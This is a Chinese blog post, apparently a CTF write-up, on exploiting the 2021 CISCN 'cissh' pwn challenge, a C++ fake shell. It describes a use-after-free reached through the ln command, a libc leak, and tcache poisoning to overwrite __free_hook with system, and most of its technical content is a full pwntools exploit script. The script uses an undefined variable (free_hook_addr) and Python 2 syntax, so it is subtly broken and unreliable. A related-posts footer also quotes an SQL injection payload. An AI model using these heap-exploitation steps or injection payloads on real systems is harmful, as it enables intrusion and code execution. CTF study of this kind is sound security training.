2021 ciscn day2 pwn cissh

最新推荐文章于 2024-01-09 16:13:54 发布
最新推荐文章于 2024-01-09 16:13:54 发布
阅读量249 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yongbaoii/article/details/120011353
这篇博客探讨了一段包含C++结构体、指针操作和复杂逻辑的代码,揭示了如何通过输入操作触发内存漏洞,特别是UAF(Use-After-Free)。作者展示了如何利用这个漏洞来执行任意命令,最终通过填充Tcache并篡改`__free_hook`来实现代码执行。博客中包含了详细的漏洞利用步骤和exploit代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
保护都健在。

在这里插入图片描述
庞大的C++以及复杂的结构体注定了这道题的思路就只能是连猜带蒙。

刚进来简简单单几行
在这里插入图片描述但是旁边的函数条告诉我事情并不是那么简单。

这几行里面首先是一个welcome,没啥说的。
然后看起来是定义了一个manager的结构体,然后下一行是通过结构体得到了一个__shared_ptr_access一个指针。

manager结构体里面也确实有一个那个名字的指针
在这里插入图片描述
指针再进去是一个函数,函数里面就又是一大堆乱七八糟。

在这里插入图片描述

你会发现有个函数多次出现

在这里插入图片描述然后再怎么样就不知道了,那我们回去看看下面的主逻辑程序。

在这里插入图片描述有个输出有个输入,然后再执行execute。

在这里插入图片描述然后就又是一堆。

逻辑分析的清清楚楚是万万做不到的,仅仅是大概发现
在这里插入图片描述
从输入里取了个啥然后跟traits取出来的比对,然后大概是执行的样子。

找到traits里面有啥。

在这里插入图片描述
有个函数表,那么我们就猜测就是执行类似于linux命令的代码而已。

程序中存在 ln 操作可以软链接一个文件,但是源文件删除后 ln 后的内容仍然存在,通过盲测触发了一个 double free 报错

这意味着文件“b”还在使用文件“a”的数据指针,存在 UAF

有了 UAF 之后就直接填满 Tcache 后利用 unsortedbin 泄露出 libc_base,再修改 tcache 的 next 指针为__free_hook,两次申请后得到__free_hook,劫持__free_hook就好啦。

exp

from pwn import *

context.log_level = "debug"

r = process("./cissh")

libc = ELF("/home/wuangwuang/glibc-all-in-one-master/glibc-all-in-one-master/libs/2.31-0ubuntu9.2_amd64/libc.so.6")

def touch(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "touch " + name)

def vi(name, content):
    r.sendlineafter("\x1B[31m$ \x1B[m", "vi " + name)
    r.sendline(content)

def cat(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "cat " + name)

def ln(name1, name2):
    r.sendlineafter("\x1B[31m$ \x1B[m", "ln " + name1 + " " + name2)

def rm(name):
    r.sendlineafter("\x1B[31m$ \x1B[m", "rm " + name)

for i in range(8):
    name = 'a' + str(i)
    touch(name)
    vi(name, str(i) * 0x100)
    
ln('b', 'b')
ln('c', 'c')

for i in range(8):
    name = 'a' + str(i)
    rm(name)

cat('b')
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

vi('c', p64(free_hook_addr))
touch('d')
vi('d', '/bin/sh\x00' * (0x100 // 8))
touch('e')
vi('e', p64(system_addr) * (0x100 // 8))
rm('d')
    
r.interactive()
Gitlab CI/CD 中使用 ssh-key,登录远程主机部署,执行远程主机的特定脚本
知无涯
05-22 5804
在开发流水线,完成部署作业时,有时需要在流水线构建环境中下载其他项目的代码,并修改推送。也可能将构建物传输到一个远程主机上,或者登录到远程主机执行一段部署脚本。都是要使用以下这段作业来完成。当然首先需要构建免密通道。
Linux PWN从入门到熟练
墨痕诉清风的博客
07-19 1920
最近在复习pwn的一些知识。主要涉及到当堆栈开启了保护的时候,我们不能够直接将shellcode覆盖到堆栈中执行,而需要利用程序其他部分的可执行的小片段来连接成最终的shellcode。此小片段就是gadgets。本文主要通过练习题的方式讲述如何寻找gadgets,如何利用现有的工具来加速自己的pwn的效率。Gadgets的类型和难度也逐步变化。下面带来手把手教你linux pwn。让你的pwn技术从入门到熟练。练习题的难度逐步加大。
ssh 命令_gitlab配置ci自动执行ssh构建命令
weixin_39805529的博客
11-30 1192
前言gitlab提供了免费的ci功能,可以持续集成,通过简单的配置,我们能用ci调用ssh,在远程服务器执行命令。比如重启容器之类的简单任务配置找到项目的Settings -> CI/CD->Variables,添加一个名为SSH_PRIVATE_KEY的变量,内容为你的ssh 私匙,确保能通过该私匙登陆你的ssh服务器然后编辑你项目的.gitlab-ci.yml配置文件job1: ...
pwn.college使用ssh连接desktop
最新发布
Falling_Asteroid的博客
01-09 1174
ASU CSE365: Introduction to Cybersecurity - CS自学指南 (csdiy.wiki)连接其实不需要使用linux,powershell也可以。
乱七八糟的pwn入门(二)——1.fd
Z_Pathon的博客
08-06 773
审题 环境配好了,要开始做第一道题了,好激动。让我们打开pwnable.kr,看第一道题。 第一题的题目如下: 小学养成的好习惯,先审题。可以看到,题目上问,linux的“file descriptor”是啥? 是啥?俺也不知道,俺也不想问。这个时候先查资料有点无聊,又看到最下面给了一行命令: ssh fd@pwnable.kr -p2222 ...
pwn|软件安全相关问题学习笔记
柷敔的博客
04-16 1676
软件安全相关问题比较琐碎,很多东西一时间记住了但是之后又忘掉了,因此以此文来荟萃各种零零散散的知识点,以备不虞。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
CISCN 2020 Final Day2 pwn3思路分享 .pdf
09-05
CISCN 2020 Final Day2 pwn3思路分享》 本文主要探讨的是在CISCN 2020网络安全大赛第二天的pwn3挑战中的解题思路,涉及的是利用漏洞进行安全对抗的技术。该挑战的核心在于对二进制程序的深入理解和巧妙利用,以...
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2460
2022 CISCN 初赛pwn的完整wp
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
ciscn2021初赛pwn部分wp
eeeeeight的博客
05-17 1268
ciscn2021初赛 感谢wepn的队友 Column: May 17, 2021 pwny: 首先ida看一眼发现read文件描述符全是3, 好像是读个随机数, 然后我们在3的地址上连着用Write读两次就可以把他变成0, 就可以写入内存了, 后面就是数组越界写, 负数可以往前面读读出libc偏移和pie偏移, 在得到libc之后可以获得环境变量environ的地址, 之后通过(libc_base+libc.sym[‘environ’]-pie_base-0x202060)/8, 就可以得到其位置是数组
centos7 ssh gitlab自动构建 CI/CD 免密登录
u014520797的专栏
09-06 2670
环境背景:现有A,B两台服务器。A有gitlab,B是部署环境,需要在A环境上执行shell脚本,shell脚本中包含ssh roo@*.*.*.*等等, 此时需要ssh 免密登录。 1、 在A上执行:ssh-keygen -t rsa 一切默认,不用输入密码,生成两个文件: /root/.ssh/id_rsa /root/.ssh/id_rsa.pub...
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 4011
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
2021CISCN writeup
读万卷书,行万里路。
05-16 1069
2021CISCN writeup 1.1 easy_sql 进行手动测试,发现可以进行报错注入。Payload 为: ') AND updatexml(1, concat(0x7e, (database()), 0x7e), 1)-- 尝试读取数据库表的表名,发现information关键字被过滤,猜了一下表名为 fl4g、flag,最后确定表名为 flag。 使用 join 爆出字段名。 select*from (select * from flag as a join flag b)c sele
pwntools初体验
公众号shadow sock7
02-22 2938
Python 2.7.12 (default, Sep 28 2016, 18:41:32) [GCC 4.2.1 Compatible Apple LLVM 8.0.0 (clang-800.0.38)] on darwin Type “help”, “copyright”, “credits” or “license” for more information. >>> from pwn
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
使用Travis-ci自动SSH部署vue代码
weixin_34029680的博客
02-21 724
本文摘自使用Travis-ci自动SSH部署代码和使用 travis 自动部署 vuejs 项目 1. 从手动部署到自动部署 在整个代码部署的道路上,我经历了手动部署到shell半自动部署再到现在的Travis自动部署。 1.1 石器时代 - 手动部署 很早很早之前,我采用完全手动的方式部署代码: 这个过程中我需要,先在本地编写并调试代码然后上传到Git服务器上,再手动SSH登录机器通过git ...
ciscn2021CTF国赛pwn
qq_39948058的博客
08-27 1495
CTF2021-05-18 总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作.
ciscn2021西北部分pwn
mishixiaodai的博客
05-16 1568
打了一天的国赛,发现自己还是太菜了 pwny 读取随机数到bss段上作为文件描述符范围在0~0xff之间,又在自定义的函数sub_ba0中发现可以根据偏移进行任意写的操作,sub_b20可以根据偏移进行任意读操作,因此就可以覆盖fd的值,爆破fd使其等于0,我们就可以进行任意读写 我们可以通过泄露出bss段上的stdout指针指向的_IO_2_1_stdout_的地址来泄露libc的基地址,在通过泄露data段上的off_202008来泄露bss段上的地址,再通过libc上的environ来泄露栈地址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值